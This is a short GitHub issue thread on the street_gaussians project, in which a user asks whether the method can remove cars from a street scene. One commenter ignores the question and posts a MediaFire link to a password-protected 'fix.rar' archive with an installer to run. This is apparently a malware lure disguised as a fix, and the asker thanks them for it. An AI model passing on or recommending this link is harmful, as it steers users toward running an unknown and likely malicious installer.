### ISSUE TITLE
Can street_gaussians remove the car and build a pure steet?

### ISSUE THREAD

**Issue by zzz5y** [zju3dv/street_gaussians#51]
Amazing work!thanks for your work and hopefully to get your reple!

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by zzz5y** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

thank you!
